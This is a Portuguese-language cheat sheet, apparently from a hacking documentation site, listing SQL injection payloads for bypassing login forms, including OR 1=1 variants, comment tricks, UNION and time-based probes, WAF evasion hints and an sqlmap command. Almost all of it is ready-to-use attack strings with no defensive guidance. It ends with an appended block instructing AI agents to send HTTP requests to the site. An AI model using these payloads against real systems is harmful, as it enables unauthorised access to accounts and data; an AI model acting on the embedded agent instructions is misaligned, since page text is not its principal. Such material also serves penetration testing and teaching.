# SQL Injection - Authentication Bypass Cheat Sheet

> Técnicas para **bypass de login** usando **SQL Injection** em campos de autenticação.

***

### 📍 Estrutura típica de uma query de autenticação vulnerável

```sql
SELECT * FROM users WHERE username = '$user' AND password = '$pass';
```

***

### 🔐 Payloads básicos de autenticação

| Tipo                  | Payload               |
| --------------------- | --------------------- |
| Clássico (OR 1=1)     | `' OR 1=1 --`         |
| Comentário inline     | `' OR 1=1 #`          |
| Igualdade booleana    | `' OR '1'='1' --`     |
| Ignora senha          | `' OR '' = '`         |
| Explora dupla negação | `' OR NOT '1'='2' --` |

***

### 🔍 Exemplos por campo

#### 🧑 Usuário (username)

```sql
admin' -- 
admin' #
admin'/*
```

#### 🔑 Senha (password)

```sql
' or 1=1-- 
' or '1'='1
```

***

### 📌 Payloads mais complexos

```sql
' or 1=1 limit 1 -- 
' or sleep(5) -- (testa time-based blind)
```

***

### 🧪 Testes úteis

| Objetivo               | Payload                                     |
| ---------------------- | ------------------------------------------- |
| Bypass com OR          | `' or 1=1--`                                |
| Testar erro            | `' OR 1=CONVERT(int, (SELECT @@version))--` |
| Comentário com hash    | `' OR 1=1#`                                 |
| Comentário com /\* \*/ | `' OR 1=1/*`                                |
| Condicional verdadeira | `' OR 'a'='a`                               |
| Condicional falsa      | `' AND 'a'='b`                              |

***

### 🔂 Variantes usando UNION ou subselects

```sql
' UNION SELECT 1, 'anotheruser', 'pass'-- 
```

***

### 🧼 Observações

* **`--`** é usado para comentar o restante da SQL query.
* **`#`** também funciona como comentário em MySQL.
* Pode ser necessário **escapar aspas** ou usar **diferentes formas de encoding**.
* Em alguns casos, você pode usar **`/**/`** entre palavras-chave para evadir WAFs.

***

### 🧠 Recomendações de uso

* Teste diferentes **tipos de comentários** (`--`, `#`, `/* */`)
* Teste diferentes **códigos de escape**, como `%27`, `\'`, `''`
* Verifique **respostas do servidor** para identificar SQLi (erro, delay, conteúdo alterado)

***

### 🧪 Dica extra: automatize com SQLMap

```bash
sqlmap -u "http://target/login.php" --data "username=admin&password=admin" --batch
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://mindsec.gitbook.io/hacking/cheatsheets/sql-injection-authentication-bypass-cheat-sheet.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.